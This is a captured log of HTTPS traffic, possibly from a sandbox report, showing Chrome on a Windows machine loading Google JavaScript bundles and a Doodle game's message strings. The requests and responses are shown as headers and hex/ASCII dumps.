2024-09-26 15:55:28 UTC	1091	OUT	GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:28 UTC	829	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 12020 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:03 GMT Expires: Fri, 26 Sep 2025 08:56:03 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25165 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	561	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 31 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 30 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"100001111111001111000100001011010000001111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 31 32 32 31 32 32 31 32 31 31 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 32 31 32 32 31 32 32 31 32 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 Data Ascii: 212121212121212121212121212121212121212121212121212221212121212121212221222222122122121112212121212121212121212121212121212221212121212121212121212121212121212121222212212212221221221221221221221221221221221221221221221221221221221221221221221221221221221
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111121111111111111111111111131112131111111111111111111111111111111111111111131111131311111111111111111111111111111111112111111111111111111111111110111111111111111111111111111111111111113111111111111111111111111121111111121313112131111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 32 32 32 32 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 31 31 33 31 31 31 31 31 31 31 31 31 33 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 31 32 32 31 32 32 32 33 31 31 33 31 31 31 31 31 31 31 32 32 31 32 31 31 31 31 32 33 32 32 32 32 32 31 31 33 31 31 32 32 32 32 33 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 222211111113111111111111011111111111111111111111111111111111111111111111111111111111221131111111113133111111111111111111112122222222212222222221221222311311111112212111123222221131122223113131111111111111111111111111111111111111111111111111111111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 32 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 32 32 32 32 32 32 32 32 31 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 31 32 32 31 31 32 32 31 31 32 32 32 31 31 31 32 31 31 31 31 32 32 32 31 32 32 32 31 31 32 32 32 32 32 32 32 32 32 31 31 32 32 31 32 32 32 32 32 32 31 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111121111211111111112222222222222222222211111122222222122221111111111111111111111111211111111111111111111212121121212121212121111111111121222222222222221212211221122211121111222122211222222222112212222221222222212222222222222222122222222221111111111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 31 32 32 31 33 32 33 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 33 32 32 32 32 32 31 32 32 32 32 32 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 32 32 32 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111131312213231111111112222222222222222222222222222222222222222222222222222222222222222222222222232222212222211111111131111111111111111111111121122212111111111111111111111111111111111111111111112111111111
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 31 31 31 31 31 32 33 32 32 33 31 31 31 32 32 31 33 32 31 31 31 32 32 33 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 31 31 33 31 31 32 31 32 32 32 32 32 32 32 33 32 32 33 32 33 32 32 32 31 31 32 31 31 31 32 32 33 31 33 31 33 31 31 31 31 32 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 32 30 30 30 30 30 30 30 30 30 32 32 32 32 30 32 30 32 32 32 30 32 32 32 32 30 30 30 30 Data Ascii: 111112322311122132111223100000000000000000000000000000000000000000000200000000000000000000000000000000000000000001111111111111111111111111111111111111111111111222211311212222222322323222112111223131311112000202000000000000200020000000002222020222022220000
2024-09-26 15:55:28 UTC	339	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 33 31 30 30 30 30 30 32 33 30 31 32 33 32 31 31 32 33 30 30 30 31 31 31 32 33 32 32 32 32 33 30 30 30 30 30 30 30 32 32 33 30 30 32 32 33 32 31 32 31 32 32 32 32 32 32 33 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 33 30 30 30 30 32 33 30 32 32 32 33 33 30 30 30 31 32 32 33 31 31 32 31 32 33 31 32 32 32 32 32 32 32 32 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 32 32 32 32 33 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 32 32 32 33 31 32 32 33 31 31 31 31 30 30 30 30 30 30 30 33 33 31 33 31 33 31 Data Ascii: 000000000000000000000000000011113111111111111111111111111111122310000023012321123000111232222300000002230022321212222223111111100000000000000022300002302223300012231121231222222222300000000000000000000000002222223113110000000000022231223111100000003313131

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.16	49746	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	757	OUT	GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:28 UTC	710	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 2687 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:55:27 GMT Expires: Thu, 26 Sep 2024 15:56:27 GMT Cache-Control: public, max-age=60 Age: 1 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: application/json Vary: Accept-Encoding Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	680	IN	Data Raw: 29 5d 7d 27 0a 7b 22 62 61 63 6b 22 3a 22 42 61 63 6b 22 2c 22 62 75 74 74 6f 6e 5f 63 61 74 63 68 22 3a 22 43 61 74 63 68 22 2c 22 62 75 74 74 6f 6e 5f 68 65 61 6c 22 3a 22 48 65 61 6c 22 2c 22 62 75 74 74 6f 6e 5f 6d 61 69 6e 5f 6d 65 6e 75 22 3a 22 4d 61 69 6e 20 6d 65 6e 75 22 2c 22 62 75 74 74 6f 6e 5f 72 65 70 6c 61 79 22 3a 22 50 6c 61 79 20 61 67 61 69 6e 22 2c 22 62 75 74 74 6f 6e 5f 73 68 69 65 6c 64 22 3a 22 53 68 69 65 6c 64 22 2c 22 62 75 74 74 6f 6e 5f 74 68 72 6f 77 22 3a 22 54 68 72 6f 77 22 2c 22 63 68 61 72 61 63 74 65 72 5f 72 65 61 64 79 22 3a 22 52 65 61 64 79 21 22 2c 22 63 68 61 72 61 63 74 65 72 5f 73 65 6c 65 63 74 5f 63 61 74 63 68 22 3a 22 43 61 74 63 68 20 26 20 74 68 72 6f 77 22 2c 22 63 68 61 72 61 63 74 65 72 5f 73 65 6c 65 Data Ascii: )]}'{"back":"Back","button_catch":"Catch","button_heal":"Heal","button_main_menu":"Main menu","button_replay":"Play again","button_shield":"Shield","button_throw":"Throw","character_ready":"Ready!","character_select_catch":"Catch & throw","character_sele
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 61 79 65 72 73 22 3a 22 46 69 6e 64 69 6e 67 20 70 6c 61 79 65 72 73 22 2c 22 67 61 6d 65 5f 6f 76 65 72 22 3a 22 47 41 4d 45 21 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 63 6f 6e 67 72 61 74 73 22 3a 22 43 6f 6e 67 72 61 74 73 21 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 6c 61 73 74 5f 6b 65 72 6e 65 6c 22 3a 22 59 6f 75 27 72 65 20 74 68 65 20 6c 61 73 74 20 70 6c 61 79 65 72 20 73 74 61 6e 64 69 6e 67 22 2c 22 67 61 6d 65 5f 6f 76 65 72 5f 6c 61 73 74 5f 73 71 75 61 64 22 3a 22 59 6f 75 27 72 65 20 74 68 65 20 6c 61 73 74 20 73 71 75 61 64 20 73 74 61 6e 64 69 6e 67 22 2c 22 68 6f 77 5f 74 6f 5f 70 6c 61 79 22 3a 22 48 6f 77 20 74 6f 20 70 6c 61 79 22 2c 22 6c 65 76 65 6c 5f 63 6f 6d 70 6c 65 74 65 22 3a 22 4c 65 76 65 6c 20 63 6f 6d 70 6c 65 74 65 21 22 2c Data Ascii: ayers":"Finding players","game_over":"GAME!","game_over_congrats":"Congrats!","game_over_last_kernel":"You're the last player standing","game_over_last_squad":"You're the last squad standing","how_to_play":"How to play","level_complete":"Level complete!",
2024-09-26 15:55:28 UTC	617	IN	Data Raw: 20 74 68 65 20 6a 6f 79 73 74 69 63 6b 20 74 6f 20 6d 6f 76 65 20 74 6f 20 74 68 65 20 74 61 72 67 65 74 2e 22 2c 22 74 75 74 6f 72 69 61 6c 5f 73 6b 69 70 22 3a 22 53 6b 69 70 20 74 75 74 6f 72 69 61 6c 20 3e 22 2c 22 74 77 69 74 74 65 72 22 3a 22 58 22 2c 22 75 6e 6d 75 74 65 22 3a 22 55 6e 6d 75 74 65 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 22 3a 22 59 6f 75 20 70 6f 70 70 65 64 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 5f 73 71 75 61 64 22 3a 22 59 6f 75 72 20 73 71 75 61 64 20 70 6f 70 70 65 64 22 2c 22 79 6f 75 5f 70 6f 70 70 65 64 5f 73 71 75 61 64 5f 73 75 62 68 65 61 64 65 72 22 3a 22 59 6f 75 72 20 73 71 75 61 64 20 63 61 6e 20 72 65 76 69 76 65 20 79 6f 75 2e 22 2c 22 79 6f 75 72 5f 73 71 75 61 64 22 3a 22 59 6f 75 72 20 73 71 75 61 64 22 2c 22 6d Data Ascii: the joystick to move to the target.","tutorial_skip":"Skip tutorial >","twitter":"X","unmute":"Unmute","you_popped":"You popped","you_popped_squad":"Your squad popped","you_popped_squad_subheader":"Your squad can revive you.","your_squad":"Your squad","m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.16	49748	142.250.185.142	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:28 UTC	894	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
2024-09-26 15:55:28 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 126135 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 00:21:53 GMT Expires: Fri, 26 Sep 2025 00:21:53 GMT Cache-Control: public, max-age=31536000 Last-Modified: Fri, 06 Sep 2024 22:07:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 56015 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:28 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 62 61 2c 66 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 75 61 2c 77 61 3b 62 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var ba,fa,ha,na,oa,sa,ua,wa;ba=fun
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 Data Ascii: n a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw E
2024-09-26 15:55:28 UTC	1390	IN	Data Raw: 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 62 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 75 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e Data Ascii: efined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:ba(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ua=typeof Object.assign=="function"?Object.
